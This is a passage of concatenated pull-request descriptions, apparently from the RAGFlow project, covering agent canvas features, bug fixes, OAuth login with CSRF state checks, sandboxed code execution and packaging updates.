` def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame,
partial]]:
o = getattr(self._param, self._param.output_var_name)`
this method needs to be called,
but I do not have full context.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use memo to wrap canvas nodes to improve fluency #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Truncate long agent descriptions to prevent overflow outside the agent
card container
### What problem does this PR solve?
Currently, long description text overflows the agent card; it should be
truncated so that it displays properly.
<img width="275" alt="Screenshot 2025-05-28 220329"
src="https://github.com/user-attachments/assets/954b3a48-bcab-4669-a42f-6981d4bf859f"
/>
<img width="275" alt="Screenshot 2025-05-28 220353"
src="https://github.com/user-attachments/assets/f385d95a-3e40-4117-b412-ae6a4508e646"
/>
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Use useWatch to synchronize the form data to canvas zustand #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change the citation mark to [ID:n]; it's easier for LLMs to follow the
instruction :) #7904
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix: Display bug in the early stage of conversation chat #7904
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix early return when updating a doc. #7886
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
…sing the SDK chat API
### What problem does this PR solve?
When using the SDK for chat, you can include the IDs of additional
knowledge bases you want to use in the request. This way, you don’t need
to repeatedly create new assistants to support various combinations of
knowledge bases. This is especially useful when there are many knowledge
bases with different content. If users clearly know which knowledge base
contains the information they need and select accordingly, the recall
accuracy will be greatly improved.
Users only need to add an extra field, a kb_ids array, in the HTTP
request. The content of this field can be determined by the client
fetching the list of knowledge bases and letting the user select from
it.
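As a rough illustration of the request body, the sketch below adds an optional `kb_ids` array. Only `kb_ids` comes from the description above; the other field names (`question`, `stream`) and the helper itself are assumptions, and no endpoint URL is implied.

```python
import json


def build_chat_request(question, kb_ids=None, stream=False):
    """Build a JSON chat request body with an optional kb_ids array."""
    body = {"question": question, "stream": stream}
    if kb_ids:
        # Extra knowledge bases chosen by the user for this request only.
        body["kb_ids"] = list(kb_ids)
    return json.dumps(body)
```

A client would typically fetch the list of knowledge bases, let the user pick from it, and pass the selected IDs here.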
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Li Ye <liye@unittec.com>
conversation change to sessions
### What problem does this PR solve?
The related_question interface has the wrong URI in the HTTP API doc
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Close #7879
I checked the current master code: kb_parser_config is joined from the
knowledge table, so I think there are some edge cases caused by
historical data
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
**Issue Description:**
When using the `/api/retrieval` endpoint with a POST request and setting
the `keyword` parameter to `true`, the system invokes the
`model_instance` method from `TenantLLMService` to create a `chat_mdl`
instance. Subsequently, it calls the `keyword_extraction` method to
extract keywords.
However, within the `keyword_extraction` method, the `chat` function of
the LLM attempts to access the `chat_mdl.max_length` attribute to
validate input length. This results in the following error:
```
AttributeError: 'SILICONFLOWChat' object has no attribute 'max_length'
```
**Proposed Solution:**
Upon reviewing other parts of the codebase where `chat_mdl` instances
are created, it appears that utilizing `LLMBundle` for instantiation is
more appropriate. `LLMBundle` includes the `max_length` attribute, which
should resolve the encountered error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
add DeepWiki Badge Maker
### Type of change
- [x] Other (please describe):add DeepWiki Badge Maker
---------
Co-authored-by: lixiaodong11 <lixiaodong11@hikvision.com.cn>
### What problem does this PR solve?
Feat: Add the SelectWithSearch component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Put buildSelectOptions to common-util.ts #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
There are two main changes:
1. Update xgboost to 1.6.0 so that the project builds on macOS with Apple
chips. This change relates to the issue
https://github.com/infiniflow/ragflow/issues/5114.
2. When `use_china_mirrors` is set in `download_deps.py`, the names of the
Chrome files downloaded by the script differ from the file names used in
the Dockerfile, so I added the file name to the `get_urls` function to
solve this problem.
I think it would be better to add testing for the Docker image
`infiniflow/ragflow_deps` to the test workflow, but since the workflow
currently runs on a self-hosted runner, I'm not sure how to modify
it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add the WaitingDialogue operator. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR solves the problems mentioned in PR
https://github.com/infiniflow/ragflow/pull/7140, which I also
submitted.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### Introduction
I fixed the problems that occur when using OpenSearch as the DOC_ENGINE:
the pytest failures and the incorrect API return values.
The fixes mainly concern deleting, listing, updating, and retrieving chunks.
The pytest command "cd sdk/python && uv sync --python 3.10 --group test
--frozen && source .venv/bin/activate && cd test/test_http_api &&
DOC_ENGINE=opensearch pytest test_chunk_management_within_dataset -s
--tb=short " now succeeds.
### Others
Because Elasticsearch and OpenSearch differ in some behaviors, some pytest
results for OpenSearch are correct and reasonable. However, some pytest
params (skipif params) are incompatible, so I changed some of the skipif
params.
As a search engine programmer, I will continue to focus on the usage of
vector databases (especially OpenSearch) for RAG.
Thanks for your review.
### What problem does this PR solve?
Feat: Convert the data of the message operator to a string array #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Upgrade react-hook-form to the latest version to solve the problem
that appending a useFieldArray entry cannot trigger the watch callback
function #3221
[issue: watch is not called when appending first item to Field Array
#12370](https://github.com/react-hook-form/react-hook-form/issues/12370)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Close #7830
The caller method should already have code to handle this.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Delete the corresponding MinIO bucket when deleting a knowledge base.
[issue #4113](https://github.com/infiniflow/ragflow/issues/4113)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the script text of the code operator is not
displayed after refreshing the page after saving the script text of the
code operator #4977
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Refactor the MessageForm with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add more robust fallbacks for citations
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change the default models to built-in models.
https://github.com/infiniflow/ragflow/issues/7774
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. Add sandbox options for max memory and timeout.
2. Malicious code detection for Python only.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add code_executor_manager. #4977.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Translate the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Reconstruct the QueryTable of BeginForm using shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Synchronize BeginForm's query data to the canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: xiaohzho <xiaohzho@cisco.com>
### What problem does this PR solve?
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Verify the parameters of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Refactor BeginForm with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This small PR resolves the regex library warnings shown in Python 3.11:
```python
DeprecationWarning: 'count' is passed as positional argument
```
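For illustration, the usual way to avoid this kind of warning is to pass `count` by keyword. The sketch below uses the standard-library `re.sub`, which accepts `count` as a keyword argument; the pattern and input string are made up for the example and are not taken from the PR.

```python
import re

text = "a-b-c-d"

# Passing count by keyword keeps it from being confused with the flags argument.
result = re.sub(r"-", "+", text, count=2)
print(result)
```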
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Signed-off-by: Emmanuel Ferdman <emmanuelferdman@gmail.com>
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7761
However, achieving zero delay may be difficult, since it requires passing
the cancel token to all parts.
Another solution is to show the cancellation immediately in the UI
and let the task stop later.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add return value widget to CodeForm #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Switching the programming language of the code operator will
switch the corresponding language template #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the page would refresh continuously when
opening the sheet on the right side of the canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
delete useless image blobs when the task executor meets edge cases
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the agent list page by page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Migrate the code operator to the new agent. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The image displayed in the reply message can also be clicked to
display the location of the source document where the slice is located
#7623
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the list datasets HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation Updates
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Add OAuth `state` parameter for CSRF protection:
- Updated `get_authorization_url()` to accept an optional state
parameter
- Generated a unique state value during OAuth login and stored in
session
- Verified state parameter in callback to ensure request legitimacy
This PR follows OAuth 2.0 security best practices by ensuring that the
authorization request originates from the same user who initiated the
flow.
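The three steps above can be sketched with the standard library alone. This is a minimal illustration under stated assumptions: the `session` is a plain dict standing in for the web framework's session object, and the `oauth_state` key and both function names are hypothetical, not the names used in the PR.

```python
import hmac
import secrets


def start_login(session: dict) -> str:
    """Generate a unique state value and remember it for the callback."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state  # hypothetical session key
    return state  # would be appended to the authorization URL


def verify_callback(session: dict, returned_state) -> bool:
    """Accept the callback only if the returned state matches the stored one."""
    expected = session.pop("oauth_state", None)  # one-time use
    if not expected or not returned_state:
        return False
    # Constant-time comparison on bytes avoids timing leaks and non-ASCII errors.
    return hmac.compare_digest(expected.encode(), str(returned_state).encode())


session = {}
state = start_login(session)
ok = verify_callback(session, state)        # legitimate callback
replayed = verify_callback(session, state)  # same state reused after consumption
print(ok, replayed)
```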
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: When you create a new API module named xxxa_api, the access route
becomes xxx instead of xxxa. For example, when I create a new API
module named 'data_api', the access route becomes 'dat' instead of
'data'.
Fix: Fixed the issue where a new knowledge base would not be renamed
when a knowledge base with the same name already existed.
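One common Python pitfall that produces exactly the route symptom described in the first fix is using `str.rstrip` to drop a suffix. Whether that was the actual root cause in this codebase is an assumption; the sketch only demonstrates the behavior.

```python
module_name = "data_api"

# str.rstrip takes a set of characters, not a suffix: it strips every trailing
# '_', 'a', 'p', or 'i', so the final 'a' of "data" is lost as well.
wrong = module_name.rstrip("_api")

# str.removesuffix (Python 3.9+) removes the exact suffix once.
right = module_name.removesuffix("_api")

print(wrong, right)
```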
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: tangyu <1@1.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Modify the Python language template code of the code operator
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
More fallbacks for bad citation format
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Fixed uncaptured figure data with position information. #7466, #7681
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Make a best-effort attempt to automatically repair corrupted PDF files on upload.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Updated the dialog settings function to add a default prompt
configuration for no dataset.
- The prompt configuration will be determined based on the presence of
`kb_ids` in the request.
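A minimal sketch of that selection logic follows. The prompt texts, dictionary layout, and function name are hypothetical placeholders; only the idea of branching on the presence of `kb_ids` comes from the description.

```python
# Hypothetical prompt configurations; the real defaults are not given in the PR text.
PROMPT_WITH_DATASET = {
    "system": "Answer using the knowledge base: {knowledge}",
    "parameters": [{"key": "knowledge", "optional": False}],
}
PROMPT_NO_DATASET = {
    "system": "You are a helpful assistant.",
    "parameters": [],
}


def default_prompt_config(req: dict) -> dict:
    """Pick the default prompt configuration based on whether kb_ids is present and non-empty."""
    return PROMPT_WITH_DATASET if req.get("kb_ids") else PROMPT_NO_DATASET


print(default_prompt_config({"kb_ids": ["kb_001"]})["system"])
print(default_prompt_config({})["system"])
```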
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (Non-breaking change, adding functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
## Cause of the bug:
Due to improper use of the trio CapacityLimiter, the configuration
parameter MAX_CONCURRENT_TASKS had no effect during execution, so the
executor pulled a large number of tasks from the Redis queue at once.
When many tasks exist at the same time, this makes the task executor use
too much memory and get killed by the OS.
As a result, all executing tasks are suspended.
## Fix:
Added the task_manager method at the entry point of /rag/svr/task_executor.py
so that the CapacityLimiter takes effect. Deleted the ineffective async with
statement.
## Fix result:
After testing, the task executor behaves as expected, that is:
it executes up to $MAX_CONCURRENT_TASKS tasks concurrently.
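The key idea, taking a capacity slot before pulling the next task off the queue, can be sketched as follows. This is not the PR's code: it swaps in `asyncio.Semaphore` and `asyncio.Queue` from the standard library for trio's `CapacityLimiter` and the Redis queue, and the function names and limit value are hypothetical.

```python
import asyncio

MAX_CONCURRENT_TASKS = 3  # hypothetical value for the demo


async def run_executor(task_count: int) -> int:
    """Process task_count queued tasks and return the peak number running at once."""
    queue: asyncio.Queue = asyncio.Queue()
    for task_id in range(task_count):
        queue.put_nowait(task_id)

    limiter = asyncio.Semaphore(MAX_CONCURRENT_TASKS)
    running = 0
    peak = 0

    async def handle_task(task_id: int) -> None:
        nonlocal running, peak
        running += 1
        peak = max(peak, running)
        try:
            await asyncio.sleep(0.01)  # stand-in for real work
        finally:
            running -= 1
            limiter.release()  # free the slot only when the task is done

    jobs = []
    while not queue.empty():
        await limiter.acquire()  # wait for a free slot BEFORE taking a task
        task_id = queue.get_nowait()
        jobs.append(asyncio.create_task(handle_task(task_id)))
    await asyncio.gather(*jobs)
    return peak


peak = asyncio.run(run_executor(10))
print(peak)
```

Because the slot is acquired before the dequeue, tasks stay in the queue until there is capacity instead of piling up in the executor's memory.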
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Hello, when I input a very long line in the chat input box, it fails
with the following error:
```
2025-05-17 16:11:26,004 ERROR 182558 value too long for type character varying(255)
Traceback (most recent call last):
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3291, in execute_sql
cursor.execute(sql, params or ())
psycopg2.errors.StringDataRightTruncation: value too long for type character varying(255)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/var/home/sfc/Projects/ragflow/api/apps/conversation_app.py", line 68, in set_conversation
ConversationService.save(**conv)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3128, in inner
return fn(*args, **kwargs)
File "/var/home/sfc/Projects/ragflow/api/db/services/common_service.py", line 145, in save
return cls.save_n(**kwargs)
File "/var/home/sfc/Projects/ragflow/api/db/services/common_service.py", line 139, in save_n
sample_obj = cls.model(**kwargs).save(force_insert=True)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 6923, in save
pk = self.insert(**field_dict).execute()
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2011, in inner
return method(self, database, *args, **kwargs)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2082, in execute
return self._execute(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2887, in _execute
return super(Insert, self)._execute(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2598, in _execute
cursor = self.execute_returning(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2605, in execute_returning
cursor = database.execute(self)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3299, in execute
return self.execute_sql(sql, params)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3289, in execute_sql
with __exception_wrapper__:
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3059, in __exit__
reraise(new_type, new_type(exc_value, *exc_args), traceback)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 192, in reraise
raise value.with_traceback(tb)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3291, in execute_sql
cursor.execute(sql, params or ())
peewee.DataError: value too long for type character varying(255)
```
This PR fixes it by truncating the `name` field in the `set_conversation`
method in `conversation_app.py`.
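The truncation itself can be as small as a slice. In the sketch below, the 255 limit mirrors the `character varying(255)` column in the error above, while the helper name and constant are hypothetical.

```python
MAX_NAME_LENGTH = 255  # matches the character varying(255) column in the error


def truncate_name(name: str, limit: int = MAX_NAME_LENGTH) -> str:
    """Return name cut to at most limit characters so the insert cannot overflow."""
    return name[:limit]


long_input = "x" * 1000
print(len(truncate_name(long_input)))
```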
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Rendering recall test page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where message references could not be displayed
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Hello, our use case requires the LLM agent to invoke some tools, so I made a
simple implementation here.
This PR does two things:
1. A simple plugin mechanism based on `pluginlib`:
This mechanism lives in the `plugin` directory. For now, it only loads
plugins from `plugin/embedded_plugins`.
A sample plugin, `bad_calculator.py`, is placed in
`plugin/embedded_plugins/llm_tools`. It accepts two numbers `a` and `b`,
then gives a wrong result, `a + b + 100`.
In the future, it can load plugins from external locations with little
code change.
Plugins are divided into different types. The only plugin type supported
in this PR is `llm_tools`; such plugins must implement the `LLMToolPlugin`
class in `plugin/llm_tool_plugin.py`.
More plugin types can be added in the future.
2. A tool selector in the `Generate` component:
Added a tool selector to select one or more tools for the LLM:

With the `bad_calculator` tool and the `qwen-max` model, it produces
this result:

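To make the plugin idea concrete, here is a small sketch written without `pluginlib`. The `ToolPlugin` base class, the `invoke` method, and the `REGISTRY` dictionary are hypothetical; the real `LLMToolPlugin` interface may look different. Only the `bad_calculator` behavior (`a + b + 100`) and the `llm_tools` type name come from the description.

```python
from abc import ABC, abstractmethod


class ToolPlugin(ABC):
    """Hypothetical base class for tools that an LLM can invoke."""

    name: str

    @abstractmethod
    def invoke(self, **kwargs):
        """Run the tool with keyword arguments supplied by the model."""


class BadCalculator(ToolPlugin):
    name = "bad_calculator"

    def invoke(self, a: float, b: float) -> float:
        # Intentionally wrong, as in the sample plugin: a + b + 100.
        return a + b + 100


# Plugins grouped by type; "llm_tools" is the only type mentioned in the PR.
REGISTRY = {"llm_tools": {BadCalculator.name: BadCalculator()}}

result = REGISTRY["llm_tools"]["bad_calculator"].invoke(a=1, b=2)
print(result)
```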
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Improve oauth configuration documentation and examples.
- Related pull requests:
- #7379
- #7553
- #7587
- Related issues:
- #3495
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Fixed the issue where the height of the chat page shared externally
did not fill the window #7460
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Launch sandbox from docker-compose.
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Close #7655
Based on the code in api_app, I think the reference is one-to-one
with the message:
```python
def fillin_conv(ans):
    nonlocal conv, message_id
    if not conv.reference:
        conv.reference.append(ans["reference"])
    else:
        conv.reference[-1] = ans["reference"]
    conv.message[-1] = {"role": "assistant", "content": ans["answer"], "id": message_id}
    ans["id"] = message_id
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add code agent component.
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the delete dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation Updates
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Feat: Fixed the issue where the dataset configuration page kept
refreshing #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Use DOMPurify to filter out dangerous HTML #7668
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add the JS code (or other) executor component to Agent. #4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Deprecate `/github_callback` route in favor of
`/oauth/callback/<channel>` for GitHub OAuth integration:
- Added GitHub OAuth support in the authentication module
- Introduced `GithubOAuthClient` with methods to fetch and normalize
user info
- Updated `CLIENT_TYPES` to include GitHub OAuth client
- Deprecated `/github_callback` route and suggested using the generic
`/oauth/callback/<channel>` route
---
- Related pull requests:
- #7379
- #7553
### Usage
- [Create a GitHub OAuth
App](https://github.com/settings/applications/new) to obtain the
`client_id` and `client_secret`, configure the authorization callback
url: `https://your-app.com/v1/user/oauth/callback/github`
- Edit `service_conf.yaml.template`:
```yaml
# ...
oauth:
  github:
    type: "github"
    icon: "github"
    display_name: "Github"
    client_id: "your_client_id"
    client_secret: "your_client_secret"
    redirect_uri: "https://your-app.com/v1/user/oauth/callback/github"
# ...
```
### Type of change
- [x] Documentation Update
- [x] Refactoring (non-breaking change)
TOML-table-based project.license is deprecated as per PEP 639, see:
https://packaging.python.org/en/latest/guides/writing-pyproject-toml/#license-and-license-files
### What problem does this PR solve?
Building the project (e.g. `uv build`) produces the following warning:
```
SetuptoolsDeprecationWarning: `project.license` as a TOML table is deprecated
!!
********************************************************************************
Please use a simple string containing a SPDX expression for `project.license`. You can also use `project.license-files`. (Both options available on setuptools>=77.0.0).
By 2026-Feb-18, you need to update your project and remove deprecated calls
or your builds will no longer be supported.
See https://packaging.python.org/en/latest/guides/writing-pyproject-toml/#license for details.
********************************************************************************
!!
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
For `uv package`/`uv pip install ".[full]"`, bug introduced in #6370:
* Removes erroneous (non-package) directories (`helm`, `flask_session`)
* Adds `mcp.server` package
* Resolves "warning: package would be ignored" ambiguity by changing
`sdk` to `sdk.python.ragflow_sdk`
* Resolves "error: package directory 'intergrations' does not exist" by
including `intergrations.chatgpt-on-wechat.plugins` explicitly
* Also rearranges packages in alphabetical order, for DX.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Deleting a chunk now also deletes the image related to that chunk.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Other (please describe): llm factories update
### What problem does this PR solve?
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Add data set configuration form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display inline (non-quoted) images in the chat and search modules
#7623
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update 7 readme
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Add libjemalloc installation command. If the operating system does not
have the libjemalloc library, the execution of entrypoint.sh and
launch_backend_service.sh will be interrupted, and the
rag/svr/task_executor.py script will not be started normally.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add frontend support for third-party login integration:
- Used `getLoginChannels` API to fetch available login channels from the
server
- Used `loginWithChannel` function to initiate login based on the
selected channel
- Refactored `useLoginWithGithub` hook to `useOAuthCallback` for
generalized OAuth callback handling
- Updated the login page to dynamically render third-party login buttons
based on the fetched channel list
- Styled third-party login buttons to improve user experience
- Removed unused code snippets
> This PR removes the previously hardcoded GitHub login button. Since
the functionality only worked when `location.host` was equal to
`demo.ragflow.io`, and the authentication logic is now based on
`login.ragflow.io`, this change does not affect the existing logic and
is considered a non-breaking change
---
#### Frontend Screenshot && Backend Configuration

```yaml
# docker/service_conf.yaml.template
# ...
oauth:
  github:
    icon: github
    display_name: "Github"
    # ...
  custom_channel:
    display_name: "OIDC"
    # ...
  custom_channel_2:
    display_name: "OAuth2"
    # ...
```
---
- Related pull requests:
- #7379
- #7521
- Related issues:
- #3495
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Show images in reply messages #7608
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the chat page would jump after entering the
homepage #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the display position of recall test item images #7608
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Whether to apply graph resolution and community extraction is stored in
`task["kb_parser_config"]`. However, the previous code read
`graphrag_conf` from `task["parser_config"]`, so `with_resolution`
and `with_community` were always false.
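The effect of reading from the wrong dictionary can be shown with a toy task. In this sketch the `graphrag`, `resolution`, and `community` keys, the sample values, and the helper name are assumptions made for illustration; only `parser_config` and `kb_parser_config` come from the description.

```python
task = {
    # Document-level settings (hypothetical content); no graph options here.
    "parser_config": {"chunk_token_num": 128},
    # Knowledge-base-level settings; key names below are hypothetical.
    "kb_parser_config": {"graphrag": {"resolution": True, "community": True}},
}


def graphrag_flags(config: dict) -> tuple[bool, bool]:
    """Return (with_resolution, with_community) from a parser config dict."""
    graphrag_conf = config.get("graphrag", {})
    return (
        bool(graphrag_conf.get("resolution", False)),
        bool(graphrag_conf.get("community", False)),
    )


before = graphrag_flags(task["parser_config"])    # old lookup: flags silently default
after = graphrag_flags(task["kb_parser_config"])  # corrected lookup
print(before, after)
```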
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
